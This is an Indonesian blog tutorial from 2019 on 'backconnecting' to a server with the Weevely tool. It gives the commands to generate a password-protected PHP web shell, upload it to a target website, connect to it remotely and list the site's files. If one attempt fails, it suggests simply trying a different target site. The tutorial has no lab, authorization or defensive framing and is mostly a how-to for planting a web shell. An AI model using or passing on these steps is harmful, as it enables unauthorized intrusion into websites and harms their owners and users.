Tutorial Backconnect dengan Weevely - Information & Technology

Thursday, May 16, 2019

Tutorial Backconnect dengan Weevely





Kali ini saya bakalan share tutorial cara backconnet server. Biasanya ditutorial web web lain pada nyuruh pake tools backconnect yang menurut saya bakalan ribet, karena saya seneng nya yang simpel dan mudah makanya saya make weevely. Kenapa weevely ? karena agak mudah menurut saya
Bahan bahan buat backconnectnya berikut ini:
1.      Phyton
2.      Phyton Red Line
3.      Weevely
Jika sudah memiliki semua bahan bahan diatas langsung aja dimulai
Extract weevelynya, kalo punya saya saya extact di direktori c:\. Untuk command nya nanti menyesuaikan saja.
Pertama buka CMD nya dulu, terus arahin ke folder weveely nya atau tempat tadi ekstract weevely nya,
Kemudian buat file php dengan perintah
main.py –g –o namafile.php –p password
contohnya: main.py –g –o k.php –p sayang
kemudian tunggu sampai proses pembuatan file selesai, harus sabar
Jika sudah selesai, buka folder weevely. Pastikan disana sudah ada file sudah dibuat tadi. Terus upload di website target
Kalo sudah diupload, lanjut ke langkah berikutnya
Masukan command berikut
main.py –t –u http://namawebtarget.ez/namafile.php -p password
contoh: main.py –t –u http://namawebtarget.ez/k.php -p sayang
tunggu sampe proses nya selesai, dan lihat hasilnya
Nah kalo sudah muncul seperi gambar diatas berarti backconnectnya udah berhasil.
Coba sekarang dicek dengan perintah ls buat liat isi direktori /public_html/ karena punya saya tadi saya upload di public_html
Sukseskan, lalu bagaimana kalo backconnectnya gagal ? saya juga gak tau kenapa bisa gagal. Kalo gagal dicoba lagi, kalo masih gagal coba ganti web targetnya siapa tau bisa
Terima kasih

Comments


EmoticonEmoticon